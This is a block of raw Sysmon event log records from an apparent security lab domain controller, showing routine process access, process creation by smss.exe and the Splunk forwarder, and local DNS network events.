12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-6467-6064-0200-00000000AE01}4321028C:\Windows\System32\smss.exe{266CAFBE-64C1-6064-9000-00000000AE01}4084C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6c14|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-6467-6064-0200-00000000AE01}4321028C:\Windows\System32\smss.exe{266CAFBE-64C1-6064-9000-00000000AE01}4084C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+3c31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000003885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.166{266CAFBE-64C1-6064-9000-00000000AE01}4084C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 00000110 0000007c C:\Windows\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e72SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{266CAFBE-6467-6064-0200-00000000AE01}432C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 10341000x80000000000000003884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64C1-6064-8F00-00000000AE01}3960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64C1-6064-8F00-00000000AE01}3960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64C1-6064-8F00-00000000AE01}3960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.148{266CAFBE-64C1-6064-8F00-00000000AE01}3960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000003871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.034{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local62656- 354300x80000000000000003870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.034{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local59783- 354300x80000000000000003869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.033{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local54707- 354300x80000000000000003868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.032{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64829- 354300x80000000000000003867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.031{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local57961- 354300x80000000000000003866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.030{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56189- 